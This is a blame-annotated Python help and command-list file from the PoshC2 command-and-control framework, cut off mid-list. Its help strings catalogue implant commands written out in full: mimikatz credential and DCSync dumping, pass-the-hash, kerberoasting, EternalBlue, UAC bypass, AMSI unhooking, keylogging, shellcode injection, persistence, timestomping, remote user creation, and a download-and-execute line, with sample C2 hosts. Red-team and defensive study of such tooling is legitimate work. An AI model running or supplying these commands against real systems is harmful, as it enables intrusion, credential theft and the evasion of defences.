2018-07-23 08:55:15 +00:00
|
|
|
#!/usr/bin/python
|
|
|
|
|
2019-03-10 17:11:22 +00:00
|
|
|
logopic = r"""
|
|
|
|
__________ .__. _________ ________
|
2018-12-27 12:10:46 +00:00
|
|
|
\_______ \____ _____| |__ \_ ___ \ \_____ \\
|
2018-12-20 13:55:03 +00:00
|
|
|
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
2019-03-12 20:33:45 +00:00
|
|
|
| | ( <_>)___ \| Y \ \ \____/ \\
|
2018-12-27 12:10:46 +00:00
|
|
|
|____| \____/____ >___| / \______ /\_______ \\
|
2018-10-27 18:50:47 +00:00
|
|
|
\/ \/ \/ \/
|
2019-03-10 17:11:22 +00:00
|
|
|
=============== v4.8 www.PoshC2.co.uk =============
|
|
|
|
"""
|
2018-12-27 12:10:46 +00:00
|
|
|
|
2018-10-27 18:50:47 +00:00
|
|
|
|
2018-09-04 08:46:04 +00:00
|
|
|
py_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
startanotherimplant or sai
|
|
|
|
startanotherimplant-keepfile
|
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
|
|
|
python print "This is a test"
|
|
|
|
loadmodule
|
|
|
|
loadmoduleforce
|
|
|
|
get-keystrokes
|
|
|
|
upload-file
|
|
|
|
download-file
|
|
|
|
install-persistence
|
|
|
|
remove-persistence
|
|
|
|
get-screenshot
|
|
|
|
setbeacon
|
|
|
|
kill-implant
|
2018-09-04 18:30:59 +00:00
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
2018-09-04 08:46:04 +00:00
|
|
|
help
|
2019-02-12 17:34:21 +00:00
|
|
|
searchhelp persistence
|
2018-09-04 08:46:04 +00:00
|
|
|
back
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2019-01-13 16:16:09 +00:00
|
|
|
linuxprivchecker
|
2018-09-04 08:46:04 +00:00
|
|
|
"""
|
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
sharp_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
2018-12-30 23:52:39 +00:00
|
|
|
turtle 60s / turtle 30m / turtle 8h
|
|
|
|
ls c:\\temp\\
|
2018-12-31 00:39:09 +00:00
|
|
|
ls-recurse c:\\temp\\
|
|
|
|
get-content c:\\temp\\log.txt
|
2019-01-06 18:09:07 +00:00
|
|
|
get-userinfo
|
2018-12-27 12:10:46 +00:00
|
|
|
pwd
|
2019-01-02 20:02:03 +00:00
|
|
|
delete c:\\temp\\test.exe
|
|
|
|
move c:\\temp\\old.exe c:\\temp\\new.exe
|
2018-12-30 23:52:39 +00:00
|
|
|
resolveip 127.0.0.1
|
|
|
|
resolvednsname google.com
|
2018-12-28 18:33:43 +00:00
|
|
|
loadmodule Seatbelt.exe
|
2018-12-27 12:10:46 +00:00
|
|
|
loadmoduleforce
|
|
|
|
listmodule
|
2018-12-29 12:37:32 +00:00
|
|
|
modulesloaded
|
2018-12-31 00:14:49 +00:00
|
|
|
run-exe Core.Program Core
|
|
|
|
run-dll Seatbelt.Program Seatbelt UserChecks
|
2018-12-27 12:10:46 +00:00
|
|
|
start-process net -argumentlist users
|
2018-12-31 17:22:58 +00:00
|
|
|
download-file "c:\\temp\\test.exe"
|
|
|
|
upload-file -source /tmp/test.exe -destination "c:\\temp\\test.exe"
|
2018-12-27 12:10:46 +00:00
|
|
|
kill-implant
|
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
|
|
|
help
|
|
|
|
searchhelp listmodules
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2018-12-27 12:10:46 +00:00
|
|
|
back
|
2019-02-16 18:59:42 +00:00
|
|
|
safetydump
|
2019-01-03 18:26:06 +00:00
|
|
|
|
|
|
|
Migration
|
|
|
|
===========
|
|
|
|
inject-shellcode c:\\windows\\system32\\svchost.exe <optional-ppid-spoofid>
|
|
|
|
inject-shellcode 1453 <optional-ppid-spoofid>
|
|
|
|
|
|
|
|
Privilege Escalation:
|
|
|
|
=======================
|
|
|
|
arpscan 172.16.0.1/24 true
|
|
|
|
get-serviceperms c:\\temp\\
|
|
|
|
get-screenshot
|
2019-01-04 10:00:46 +00:00
|
|
|
get-screenshotmulti
|
2019-01-03 18:26:06 +00:00
|
|
|
get-keystrokes c:\\temp\\logger.txt
|
|
|
|
stop-keystrokes
|
|
|
|
testadcredential domain username password
|
|
|
|
testlocalcredential username password
|
|
|
|
cred-popper
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule SharpUp.exe
|
|
|
|
run-exe SharpUp.Program SharpUp
|
2019-01-03 18:26:06 +00:00
|
|
|
|
|
|
|
Privilege Escalation:
|
|
|
|
=======================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule Seatbelt.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe Seatbelt.Program Seatbelt all
|
|
|
|
run-exe Seatbelt.Program Seatbelt BasicOSInfo
|
|
|
|
run-exe Seatbelt.Program Seatbelt SysmonConfig
|
|
|
|
run-exe Seatbelt.Program Seatbelt PowerShellSettings
|
|
|
|
run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
|
|
|
|
|
2019-02-16 18:59:42 +00:00
|
|
|
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
|
|
|
=========================================================
|
|
|
|
safetydump
|
|
|
|
safetydump <pid>
|
|
|
|
|
2019-01-03 18:26:06 +00:00
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
====================================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule Rubeus.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe Rubeus.Program Rubeus kerberoast
|
|
|
|
run-exe Rubeus.Program Rubeus asreproast /user:username
|
|
|
|
|
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
====================================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule SharpView.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
|
2019-01-05 21:24:21 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
|
|
|
run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
2019-02-12 17:34:21 +00:00
|
|
|
run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
|
|
|
|
|
|
|
|
Bloodhound:
|
|
|
|
=============
|
|
|
|
loadmodule SharpHound.exe
|
2019-01-03 22:08:01 +00:00
|
|
|
run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
2018-12-27 12:10:46 +00:00
|
|
|
"""
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
posh_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
searchhelp mimikatz
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2018-11-15 14:11:32 +00:00
|
|
|
get-hash
|
|
|
|
unhidefile
|
|
|
|
hidefile
|
2018-11-19 19:38:53 +00:00
|
|
|
get-ipconfig
|
|
|
|
netstat
|
2018-07-23 08:55:15 +00:00
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
|
|
|
turtle 60s / turtle 30m / turtle 8h
|
|
|
|
kill-implant
|
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
|
|
|
get-proxy
|
|
|
|
get-computerinfo
|
|
|
|
unzip <source file> <destination folder>
|
|
|
|
get-system
|
|
|
|
get-system-withproxy
|
|
|
|
get-system-withdaisy
|
|
|
|
get-implantworkingdirectory
|
|
|
|
get-pid
|
|
|
|
posh-delete c:\\temp\\svc.exe
|
|
|
|
get-webpage http://intranet
|
|
|
|
listmodules
|
|
|
|
modulesloaded
|
|
|
|
loadmodule <modulename>
|
|
|
|
loadmodule inveigh.ps1
|
|
|
|
loadmoduleforce inveigh.ps1
|
|
|
|
get-userinfo
|
|
|
|
invoke-hostenum -all
|
|
|
|
find-allvulns
|
|
|
|
invoke-expression (get-webclient).downloadstring("https://module.ps1")
|
|
|
|
startanotherimplant or sai
|
|
|
|
invoke-daisychain -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\\test -proxypassword pass -localhost (optional if low level user)
|
|
|
|
createproxypayload -user <dom\\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>
|
|
|
|
get-mshotfixes
|
|
|
|
get-firewallrulesall | out-string -width 200
|
|
|
|
enablerdp
|
|
|
|
disablerdp
|
|
|
|
netsh.exe advfirewall firewall add rule name="enablerdp" dir=in action=allow protocol=tcp localport=any enable=yes
|
|
|
|
get-wlanpass
|
|
|
|
get-wmiobject -class win32_product
|
|
|
|
get-creditcarddata -path 'c:\\backup\\'
|
|
|
|
timestomp c:\\windows\\system32\\service.exe "01/03/2008 12:12 pm"
|
|
|
|
icacls c:\\windows\\system32\\resetpassword.exe /grant administrator:f
|
|
|
|
get-allfirewallrules c:\\temp\\rules.csv
|
|
|
|
get-allservices
|
|
|
|
get-wmireglastloggedon
|
|
|
|
get-wmiregcachedrdpconnection
|
|
|
|
get-wmiregmounteddrive
|
|
|
|
resolve-ipaddress
|
|
|
|
unhook-amsi
|
|
|
|
get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`nAMSI Loaded`n"} }
|
2018-09-16 15:53:44 +00:00
|
|
|
get-wmiObject -class win32_product
|
2018-07-23 08:55:15 +00:00
|
|
|
"""
|
|
|
|
|
|
|
|
posh_help2 = """
|
|
|
|
Privilege Escalation:
|
|
|
|
====================
|
|
|
|
invoke-allchecks
|
2018-12-20 13:55:03 +00:00
|
|
|
Invoke-PsUACme -Payload "c:\\temp\\uac.exe" -method sysprep
|
2018-07-23 08:55:15 +00:00
|
|
|
get-mshotfixes | where-object {$_.hotfixid -eq "kb2852386"}
|
|
|
|
invoke-ms16-032
|
|
|
|
invoke-ms16-032-proxypayload
|
|
|
|
invoke-eternalblue -target 127.0.0.1 -initialgrooms 5 -maxattempts 1 -msfbind
|
|
|
|
get-gpppassword
|
|
|
|
get-content 'c:\\programdata\\mcafee\\common framework\\sitelist.xml'
|
2018-09-26 16:20:58 +00:00
|
|
|
dir -recurse | select-string -pattern 'password='
|
|
|
|
"""
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
posh_help3 = """
|
|
|
|
File Management:
|
|
|
|
====================
|
|
|
|
download-file -source 'c:\\temp dir\\run.exe'
|
|
|
|
download-files -directory 'c:\\temp dir\\'
|
|
|
|
upload-file -source 'c:\\temp\\run.exe' -destination 'c:\\temp\\test.exe'
|
|
|
|
web-upload-file -from 'http://www.example.com/app.exe' -to 'c:\\temp\\app.exe'
|
|
|
|
|
|
|
|
Persistence:
|
|
|
|
================
|
|
|
|
install-persistence 1,2,3
|
|
|
|
remove-persistence 1,2,3
|
|
|
|
installexe-persistence
|
|
|
|
removeexe-persistence
|
|
|
|
install-servicelevel-persistence | remove-servicelevel-persistence
|
|
|
|
install-servicelevel-persistencewithproxy | remove-servicelevel-persistence
|
2018-09-18 19:56:33 +00:00
|
|
|
invoke-wmievent -name backup -command "powershell -enc abc" -hour 10 -minute 30
|
|
|
|
get-wmievent
|
|
|
|
remove-wmievent -name backup
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
==================
|
|
|
|
get-externalip
|
|
|
|
test-adcredential -domain test -user ben -password password1
|
|
|
|
invoke-smblogin -target 192.168.100.20 -domain testdomain -username test -hash/-password
|
2018-09-18 19:56:33 +00:00
|
|
|
invoke-smbclient -Action Put -source c:\\temp\\test.doc -destination \\test.com\\c$\\temp\\test.doc -hash
|
2018-07-23 08:55:15 +00:00
|
|
|
invoke-smbexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
|
|
|
|
invoke-wmiexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
|
|
|
|
net view | net users | net localgroup administrators | net accounts /dom
|
2018-09-26 16:20:58 +00:00
|
|
|
whoami /groups | whoami /priv
|
|
|
|
"""
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
posh_help4 = """
|
|
|
|
Active Directory Enumeration:
|
|
|
|
==================
|
|
|
|
invoke-aclscanner
|
2019-01-11 18:07:40 +00:00
|
|
|
invoke-aclscanner | Where-Object {$_.IdentityReference -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}
|
2018-07-23 08:55:15 +00:00
|
|
|
get-objectacl -resolveguids -samaccountname john
|
|
|
|
add-objectacl -targetsamaccountname arobbins -principalsamaccountname harmj0y -rights resetpassword
|
|
|
|
get-netuser -admincount | select samaccountname
|
|
|
|
get-domainuser -uacfilter not_password_expired,not_accountdisable -properties samaccountname,pwdlastset | export-csv act.csv
|
|
|
|
get-netgroup -admincount | select samaccountname
|
|
|
|
get-netgroupmember "domain admins" -recurse|select membername
|
|
|
|
get-netcomputer | select-string -pattern "citrix"
|
|
|
|
get-netcomputer -filter operatingsystem=*7*|select name
|
|
|
|
get-netcomputer -filter operatingsystem=*2008*|select name
|
|
|
|
get-domaincomputer -ldapfilter "(|(operatingsystem=*7*)(operatingsystem=*2008*))" -spn "wsman*" -properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl
|
|
|
|
get-netgroup | select-string -pattern "internet"
|
|
|
|
get-netuser -filter | select-object samaccountname,userprincipalname
|
|
|
|
get-netuser -filter samaccountname=test
|
|
|
|
get-netuser -filter userprinciplename=test@test.com
|
|
|
|
get-netgroup | select samaccountname
|
|
|
|
get-netgroup "*ben*" | select samaccountname
|
|
|
|
get-netgroupmember "domain admins" -recurse|select membername
|
|
|
|
get-netshare hostname
|
|
|
|
invoke-sharefinder -verbose -checkshareaccess
|
|
|
|
new-psdrive -name "p" -psprovider "filesystem" -root "\\\\bloredc1\\netlogon"
|
|
|
|
|
|
|
|
Domain Trusts:
|
|
|
|
==================
|
|
|
|
get-netdomain | get-netdomaincontroller | get-netforestdomain
|
|
|
|
get-netforest | get-netforesttrust
|
|
|
|
invoke-mapdomaintrust
|
|
|
|
get-netuser -domain child.parent.com -filter samaccountname=test
|
2018-09-26 16:20:58 +00:00
|
|
|
get-netgroup -domain child.parent.com | select samaccountname
|
|
|
|
"""
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
posh_help5 = """
|
|
|
|
Domain / Network Tasks:
|
|
|
|
==================
|
|
|
|
invoke-bloodhound -collectionmethod 'stealth' -csvfolder c:\\temp\\
|
|
|
|
get-netdomaincontroller | select name | get-netsession | select *username,*cname
|
|
|
|
get-dfsshare | get-netsession | select *username,*cname
|
|
|
|
get-netfileserver | get-netsession | select *username,*cname
|
|
|
|
invoke-kerberoast -outputformat hashcat|select-object -expandproperty hash
|
|
|
|
write-scffile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\
|
|
|
|
write-inifile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\
|
|
|
|
get-netgroup | select-string -pattern "internet"
|
|
|
|
invoke-hostscan -iprangecidr 172.16.0.0/24 (provides list of hosts with 445 open)
|
|
|
|
get-netfileserver -domain testdomain.com
|
|
|
|
find-interestingfile -path \\\\server\\share -officedocs -lastaccesstime (get-date).adddays(-7)
|
|
|
|
brute-ad
|
|
|
|
brute-locadmin -username administrator
|
|
|
|
get-passpol
|
|
|
|
get-passnotexp
|
|
|
|
get-locadm
|
2018-09-16 15:53:44 +00:00
|
|
|
invoke-inveigh -http y -proxy y -nbns y -tool 1 -StartupChecks y
|
2018-07-23 08:55:15 +00:00
|
|
|
get-inveigh | stop-inveigh (gets output from inveigh thread)
|
|
|
|
invoke-sniffer -outputfile c:\\temp\\output.txt -maxsize 50mb -localip 10.10.10.10
|
|
|
|
invoke-sqlquery -sqlserver 10.0.0.1 -user sa -pass sa -query 'select @@version'
|
|
|
|
invoke-runas -user <user> -password '<pass>' -domain <dom> -command c:\\windows\\system32\\cmd.exe -args " /c calc.exe"
|
|
|
|
invoke-pipekat -target <ip-optional> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional>
|
2018-09-26 16:20:58 +00:00
|
|
|
invoke-wmiexec -target <ip> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional> -command <cmd>
|
|
|
|
"""
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
posh_help6 = """
|
|
|
|
Lateral Movement:
|
|
|
|
=========================================================
|
|
|
|
invoke-runaspayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-runasproxypayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-runasdaisypayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-dcompayload -target <ip>
|
|
|
|
invoke-dcomproxypayload -target <ip>
|
|
|
|
invoke-dcomdaisypayload -target <ip>
|
|
|
|
invoke-psexecpayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-psexecproxypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-psexecdaisypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmipayload -target <ip> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmiproxypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmidaisypayload -target <ip> -domain <dom> -user <user> -pass '<pass>'
|
2018-09-26 16:20:58 +00:00
|
|
|
invoke-winrmsession -ipaddress <ip> -user <dom\\user> -pass <pass>
|
|
|
|
"""
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
posh_help7 = """
|
|
|
|
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
|
|
|
=========================================================
|
|
|
|
invoke-mimikatz -command '"sekurlsa::logonpasswords"'
|
|
|
|
invoke-mimikatz -command '"lsadump::sam"'
|
|
|
|
invoke-mimikatz -command '"lsadump::lsa"'
|
|
|
|
invoke-mimikatz -command '"lsadump::cache"'
|
|
|
|
invoke-mimikatz -command '"lsadump::secrets"'
|
|
|
|
invoke-mimikatz -command '"ts::multirdp"'
|
|
|
|
invoke-mimikatz -command '"privilege::debug"'
|
|
|
|
invoke-mimikatz -command '"crypto::capi"'
|
|
|
|
invoke-mimikatz -command '"crypto::certificates /export"'
|
|
|
|
invoke-mimikatz -command '"sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<hash> /run:c:\\temp\\run.bat"'
|
|
|
|
invoke-tokenmanipulation | select-object domain, username, processid, iselevated, tokentype | ft -autosize | out-string
|
|
|
|
invoke-tokenmanipulation -impersonateuser -username "domain\\user"
|
2018-09-25 22:05:19 +00:00
|
|
|
get-lapspasswords
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Credentials / Domain Controller Hashes:
|
|
|
|
============================================
|
|
|
|
invoke-mimikatz -command '"lsadump::dcsync /domain:domain.local /user:administrator"'
|
|
|
|
invoke-dcsync -pwdumpformat
|
2018-09-26 16:20:58 +00:00
|
|
|
dump-ntds -emptyfolder <emptyfolderpath>
|
|
|
|
"""
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
posh_help8 = """
|
|
|
|
Useful Modules:
|
|
|
|
====================
|
|
|
|
get-screenshot
|
|
|
|
get-screenshotallwindows
|
|
|
|
get-screenshotmulti -timedelay 120 -quantity 30
|
|
|
|
get-recentfiles
|
|
|
|
cred-popper
|
|
|
|
get-clipboard
|
|
|
|
hashdump
|
2019-02-12 19:45:33 +00:00
|
|
|
get-keystrokes | get-keystrokedata
|
2018-07-23 08:55:15 +00:00
|
|
|
arpscan -ipcidr 10.0.0.1/24
|
|
|
|
portscan -ipaddress 10.0.0.1-50 -ports "1-65535" -maxqueriesps 10000 -delay 0
|
|
|
|
((new-object Net.Sockets.TcpClient).connect("10.0.0.1",445))
|
2019-02-12 19:45:33 +00:00
|
|
|
get-netstat | %{"$($_.Protocol) $($_.LocalAddress):$($_.LocalPort) $($_.RemoteAddress):$($_.RemotePort) $($_.State) $($_.ProcessName)($($_.PID))"}
|
2018-11-19 19:38:53 +00:00
|
|
|
1..254 | %{ try {[System.Net.Dns]::GetHostEntry("10.0.0.$_") } catch {} }|select hostname
|
2018-07-23 08:55:15 +00:00
|
|
|
migrate
|
|
|
|
migrate -procid 4444
|
|
|
|
migrate -procpath c:\\windows\\system32\\searchprotocolhost.exe -suspended -RtlCreateUserThread
|
|
|
|
migrate -procpath c:\\windows\\system32\\svchost.exe -suspended
|
|
|
|
inject-shellcode -x86 -shellcode (gc c:\\temp\\shellcode.bin -encoding byte) -procid 5634
|
|
|
|
get-eventlog -newest 10000 -instanceid 4624 -logname security | select message -expandproperty message | select-string -pattern "user1|user2|user3"
|
|
|
|
send-mailmessage -to "itdept@test.com" -from "user01 <user01@example.com>" -subject <> -smtpserver <> -attachment <>
|
|
|
|
sharpsocks -uri http://www.c2.com:9090 -beacon 2000 -insecure
|
2019-02-12 17:34:21 +00:00
|
|
|
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow program="C:\\windows\\system32\\svchost.exe" protocol=TCP localport=80 profile=Domain
|
2018-07-23 08:55:15 +00:00
|
|
|
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);$socket.start();
|
|
|
|
reversedns 10.0.0.1
|
2018-09-16 15:53:44 +00:00
|
|
|
[System.Net.Dns]::GetHostbyAddress("10.0.0.1")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Implant Handler:
|
|
|
|
=====================
|
|
|
|
searchhelp
|
|
|
|
back
|
|
|
|
quit
|
|
|
|
exit
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
|
|
pre_help = """
|
2018-12-20 13:55:03 +00:00
|
|
|
Main Menu:
|
2018-07-23 08:55:15 +00:00
|
|
|
================================
|
|
|
|
use implant by <id>, e.g. 1
|
|
|
|
use multiple implants by <id>,<id>,<id>, e.g. 1,2,5
|
|
|
|
use implant by range, e.g. 40-45
|
|
|
|
use all implants by all
|
|
|
|
|
2018-12-20 13:55:03 +00:00
|
|
|
Auto-Runs:
|
2018-07-23 08:55:15 +00:00
|
|
|
=====================
|
|
|
|
add-autorun <task>
|
|
|
|
list-autorun (alias: l)
|
|
|
|
del-autorun <taskid>
|
|
|
|
nuke-autorun
|
|
|
|
automigrate-frompowershell (alias: am)
|
|
|
|
|
2018-12-20 13:55:03 +00:00
|
|
|
Server Commands:
|
2018-07-23 08:55:15 +00:00
|
|
|
=====================
|
|
|
|
tasks
|
|
|
|
opsec
|
2018-10-10 07:16:32 +00:00
|
|
|
show-urls
|
|
|
|
list-urls
|
2018-07-23 08:55:15 +00:00
|
|
|
cleartasks
|
2018-12-20 13:55:03 +00:00
|
|
|
show-serverinfo
|
2018-07-23 08:55:15 +00:00
|
|
|
history
|
|
|
|
output-to-html
|
|
|
|
set-clockworksmsapikey df2
|
|
|
|
set-clockworksmsnumber 44789
|
|
|
|
set-defaultbeacon 60
|
2018-09-07 11:03:57 +00:00
|
|
|
turnon-notifications
|
|
|
|
turnoff-notifications
|
2018-12-20 13:55:03 +00:00
|
|
|
listmodules
|
2018-07-23 08:55:15 +00:00
|
|
|
pwnself (alias: p)
|
2018-12-20 13:55:03 +00:00
|
|
|
creds -action <dump/add/del/search> -username <username> -password/-hash
|
2018-07-23 08:55:15 +00:00
|
|
|
createnewpayload
|
2018-12-20 13:55:03 +00:00
|
|
|
createproxypayload
|
2018-07-23 08:55:15 +00:00
|
|
|
createdaisypayload
|
2018-12-20 13:55:03 +00:00
|
|
|
quit
|
2018-07-23 08:55:15 +00:00
|
|
|
"""
|
|
|
|
|
|
|
|
posh_help = posh_help1 + posh_help2 + posh_help3 + posh_help4 + posh_help5 + posh_help6 + posh_help7 + posh_help8
|
|
|
|
|
|
|
|
# pre help commands
|
2018-10-10 07:16:32 +00:00
|
|
|
PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell',
|
2018-07-23 08:55:15 +00:00
|
|
|
'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon',
|
|
|
|
'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules',
|
2018-09-07 11:03:57 +00:00
|
|
|
'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"]
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2019-01-06 18:09:07 +00:00
|
|
|
# post help commands powershell implant
|
2018-07-23 08:55:15 +00:00
|
|
|
COMMANDS = ['loadmodule',"bloodhound","brute-ad","brute-locadmin",
|
|
|
|
"bypass-uac","cve-2016-9192","convertto-shellcode","decrypt-rdcman","dump-ntds","get-computerinfo","get-creditcarddata","get-gppautologon",
|
|
|
|
"get-gpppassword","get-idletime","get-keystrokes","get-locadm","get-mshotfixes","get-netstat","get-passnotexp","get-passpol","get-recentfiles",
|
|
|
|
"get-serviceperms","get-userinfo","get-wlanpass","invoke-hostenum","inject-shellcode","inveigh-relay","inveigh","invoke-arpscan","arpscan",
|
|
|
|
"invoke-dcsync","invoke-eventvwrbypass","invoke-hostscan","invoke-ms16-032-proxy","invoke-ms16-032","invoke-mimikatz","invoke-psinject",
|
|
|
|
"invoke-pipekat","invoke-portscan","invoke-powerdump","invoke-psexec","invoke-reflectivepeinjection","invoke-reversednslookup",
|
|
|
|
"invoke-runas","invoke-smbexec","invoke-shellcode","invoke-sniffer","invoke-sqlquery","invoke-tater","invoke-thehash",
|
|
|
|
"invoke-tokenmanipulation","invoke-wmichecker","invoke-wmicommand","invoke-wmiexec","invoke-wscriptbypassuac","invoke-winrmsession",
|
|
|
|
"out-minidump","portscan","invoke-allchecks","set-lhstokenprivilege","sharpsocks","find-allvulns","test-adcredential","new-zipfile",
|
2018-12-20 13:55:03 +00:00
|
|
|
"get-netuser","sleep","beacon","setbeacon","get-screenshot", "install-persistence","hide-implant","unhide-implant","kill-implant","invoke-runasdaisypayload",
|
2018-07-23 08:55:15 +00:00
|
|
|
"invoke-runasproxypayload", "invoke-runaspayload","migrate","$psversiontable","back", "clear","invoke-daisychain","stop-daisy",
|
|
|
|
"ipconfig","upload-file","download-file","download-files","history","get-help","stopsocks","get-screenshotallwindows",
|
2019-01-06 18:09:07 +00:00
|
|
|
"hashdump","cred-popper","help","whoami","createnewpayload","createproxypayload","createdaisypayload","get-proxy","restart-computer",
|
|
|
|
"turtle","posh-delete","get-idletime","get-psdrive","get-netcomputer","get-netdomain","get-netforest","get-netforesttrust",
|
|
|
|
"get-forestdomain","test-connection","get-netdomaincontroller","invoke-pbind","pbind-command","invoke-kerberoast","invoke-userhunter",
|
|
|
|
"get-process","start-process","searchhelp","get-netshare","pbind-kill","install-servicelevel-persistencewithproxy",
|
|
|
|
"install-servicelevel-persistence","remove-servicelevel-persistence","reversedns","invoke-eternalblue","loadmoduleforce","unhook-amsi",
|
|
|
|
"get-implantworkingdirectory","get-system","get-system-withproxy","get-system-withdaisy","get-pid","listmodules","modulesloaded",
|
|
|
|
"startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence","get-hash","get-creds","resolve-ipaddress",
|
|
|
|
"invoke-wmievent","remove-wmievent","get-wmievent","invoke-smbclient","get-keystrokedata","unhidefile","hidefile", "label-implant",
|
|
|
|
'invoke-psexecpayload','invoke-wmipayload','invoke-dcompayload','invoke-psexecproxypayload','invoke-wmiproxypayload',
|
|
|
|
'invoke-dcomproxypayload','invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
|
|
|
|
|
|
|
|
# post help commands python implant
|
|
|
|
UXCOMMANDS = ["label-implant", "unhide-implant","hide-implant","help","searchhelp","python","loadmodule",
|
|
|
|
"loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai",
|
2019-01-13 16:16:09 +00:00
|
|
|
"startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant","linuxprivchecker"]
|
2019-01-06 18:09:07 +00:00
|
|
|
|
|
|
|
# post help commands sharp implant
|
|
|
|
SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","move","label-implant","upload-file",
|
|
|
|
"download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
|
|
|
|
"testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
|
|
|
|
